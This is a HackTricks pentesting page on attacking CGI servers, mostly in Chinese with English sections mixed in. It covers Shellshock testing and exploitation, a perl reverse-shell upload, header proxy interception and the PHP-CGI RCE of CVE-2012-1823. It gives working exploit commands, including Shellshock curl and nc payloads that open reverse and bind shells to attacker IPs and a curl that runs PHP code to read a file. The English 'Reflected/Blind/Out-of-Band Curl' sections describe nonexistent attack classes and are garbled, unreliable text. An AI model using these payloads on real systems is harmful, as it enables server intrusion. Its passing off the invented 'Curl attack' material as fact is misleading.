hacktricks/network-services-pentesting/pentesting-web/cgi.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>


# 信息

**CGI脚本是perl脚本**，所以，如果你已经入侵了一个可以执行_**.cgi**_脚本的服务器，你可以**上传一个perl反向shell**（`/usr/share/webshells/perl/perl-reverse-shell.pl`），**将扩展名**从**.pl**改为**.cgi**，给予**执行权限**（`chmod +x`）并且**通过web浏览器访问**反向shell来执行它。
为了测试**CGI漏洞**，建议使用`nikto -C all`（以及所有插件）

# **ShellShock**

Bash也可以用于运行应用程序传递给它的命令，正是这个功能受到了漏洞的影响。可以发送给Bash的一种命令类型允许设置环境变量。环境变量是动态的、命名的值，影响计算机上运行的进程的方式。漏洞在于**攻击者可以将恶意代码附加到环境变量中，在接收到变量后运行该代码**。

利用这个漏洞，**页面可能会抛出错误**。

你可以通过注意到它使用了**旧版本的Apache**和**cgi_mod**（带有cgi文件夹）或使用**nikto**来**发现**这个漏洞。

## **测试**

大多数测试都是基于输出一些内容，并期望该字符串在web响应中返回。如果你认为一个页面可能存在漏洞，请搜索所有的cgi页面并对它们进行测试。

**Nmap**
```bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```
## **Curl（反射型、盲注和带外）**

---

### **Reflected Curl**

#### **Description**

Reflected Curl is a technique used to exploit web applications that reflect user-supplied input in the response. This vulnerability occurs when the application takes user input and includes it in the response without proper sanitization or validation. An attacker can craft a malicious request that includes Curl commands as input, which are then executed by the server and the output is reflected back in the response.

#### **Exploitation**

To exploit this vulnerability, an attacker can send a specially crafted request to the target web application, including Curl commands as input. The server will execute these commands and include the output in the response. The attacker can then analyze the response to gather sensitive information or perform further attacks.

#### **Mitigation**

To mitigate the risk of reflected Curl attacks, it is important to properly sanitize and validate user input before including it in the response. This can be done by implementing input validation and output encoding techniques, such as using secure coding practices and frameworks that automatically handle input sanitization.

---

### **Blind Curl**

#### **Description**

Blind Curl is a technique used to exploit web applications that do not directly reflect user-supplied input in the response, but still execute Curl commands based on that input. This vulnerability occurs when the application takes user input and uses it to construct Curl commands that are executed by the server without directly reflecting the output in the response.

#### **Exploitation**

To exploit this vulnerability, an attacker needs to find a way to infer the output of the executed Curl commands indirectly. This can be done by observing the behavior of the application, such as the response time or the presence of certain error messages. By carefully crafting input, the attacker can manipulate the behavior of the application and gather information about the executed Curl commands.

#### **Mitigation**

To mitigate the risk of blind Curl attacks, it is important to carefully review and validate the construction of Curl commands based on user input. Additionally, implementing proper error handling and logging mechanisms can help detect and prevent blind Curl vulnerabilities.

---

### **Out-of-Band Curl**

#### **Description**

Out-of-Band Curl is a technique used to exploit web applications by leveraging external communication channels to retrieve the output of executed Curl commands. This vulnerability occurs when the application executes Curl commands that trigger external requests to a controlled server, allowing the attacker to capture the output through this communication channel.

#### **Exploitation**

To exploit this vulnerability, an attacker needs to set up a controlled server that can receive the external requests triggered by the executed Curl commands. By crafting malicious input that includes Curl commands, the attacker can make the application send requests to the controlled server, which captures the output and allows the attacker to gather sensitive information.

#### **Mitigation**

To mitigate the risk of out-of-band Curl attacks, it is important to carefully review and validate the execution of Curl commands within the application. Additionally, implementing proper input validation and output encoding techniques can help prevent the inclusion of malicious Curl commands in user input.
```bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
```
[**Shellsocker**](https://github.com/liamim/shellshocker)
```bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```
## 攻击利用

Exploiting vulnerabilities in CGI scripts is a common technique used in web application penetration testing. CGI (Common Gateway Interface) is a protocol that allows web servers to execute scripts and generate dynamic content. By exploiting vulnerabilities in CGI scripts, an attacker can gain unauthorized access to the server or execute arbitrary code.

### Remote Command Execution

Remote Command Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary commands on the target server. In the context of CGI scripts, RCE vulnerabilities can be exploited by injecting malicious commands into user input fields or by manipulating the parameters passed to the script.

To exploit an RCE vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to command injection. Once identified, the attacker can craft a payload that includes the malicious command and submit it to the server. If the vulnerability is successfully exploited, the server will execute the injected command and return the output to the attacker.

### File Inclusion

File Inclusion vulnerabilities occur when a CGI script includes external files without proper validation. This can allow an attacker to include arbitrary files from the server's file system, potentially exposing sensitive information or executing malicious code.

To exploit a File Inclusion vulnerability in a CGI script, an attacker needs to identify the vulnerable inclusion point and provide a path to the file they want to include. This can be done by manipulating the parameters passed to the script or by exploiting other vulnerabilities to gain control over the file inclusion process.

Once the File Inclusion vulnerability is successfully exploited, the attacker can read sensitive files, such as configuration files or user credentials, or execute arbitrary code by including a malicious file.

### Directory Traversal

Directory Traversal vulnerabilities occur when a CGI script does not properly sanitize user input, allowing an attacker to navigate outside of the intended directory structure and access files or directories that should be restricted.

To exploit a Directory Traversal vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to directory traversal attacks. By manipulating these inputs, the attacker can navigate to directories outside of the intended scope and access sensitive files or directories.

Once the Directory Traversal vulnerability is successfully exploited, the attacker can read or modify files, upload malicious files, or gain unauthorized access to restricted areas of the server.

### Code Injection

Code Injection vulnerabilities occur when a CGI script does not properly validate or sanitize user input, allowing an attacker to inject and execute arbitrary code on the server.

To exploit a Code Injection vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to code injection. By injecting malicious code into these inputs, the attacker can trick the server into executing the injected code.

Once the Code Injection vulnerability is successfully exploited, the attacker can execute arbitrary commands, gain unauthorized access to the server, or perform other malicious activities.

### Conclusion

Exploiting vulnerabilities in CGI scripts can provide attackers with unauthorized access to servers or the ability to execute arbitrary code. It is important for web application developers and administrators to properly validate and sanitize user input to prevent these types of vulnerabilities. Regular security assessments and penetration testing can help identify and mitigate these risks.
```bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
```
# **代理（中间人攻击到Web服务器请求）**

CGI为每个HTTP请求的头部创建一个环境变量。例如："host:web.com"被创建为"HTTP\_HOST"="web.com"

由于Web服务器可能使用HTTP\_PROXY变量，尝试发送一个包含： "**Proxy: &lt;IP\_attacker&gt;:&lt;PORT&gt;**"的头部。如果服务器在会话期间执行任何请求，您将能够捕获服务器发出的每个请求。

# 旧版PHP + CGI = RCE（CVE-2012-1823，CVE-2012-2311）

基本上，如果cgi处于活动状态且php是“旧的”（&lt;5.3.12 / &lt; 5.4.2），则可以执行代码。
为了利用此漏洞，您需要访问Web服务器的某个PHP文件，而无需发送参数（特别是不发送字符“=”）。
然后，为了测试此漏洞，您可以访问例如`/index.php?-s`（注意`-s`），并且应用程序的**源代码将出现在响应中**。

然后，为了获得**RCE**，您可以发送此特殊查询：`/?-d allow_url_include=1 -d auto_prepend_file=php://input`，并将要在**请求的正文中执行的PHP代码**。示例：
```bash
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
```
**有关漏洞和可能的利用的更多信息：**[**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**，**[**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**，**[**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**，**[**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**



<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- 你在**网络安全公司**工作吗？想要在HackTricks中看到你的**公司广告**吗？或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！

- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)

- 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)

- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**

- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>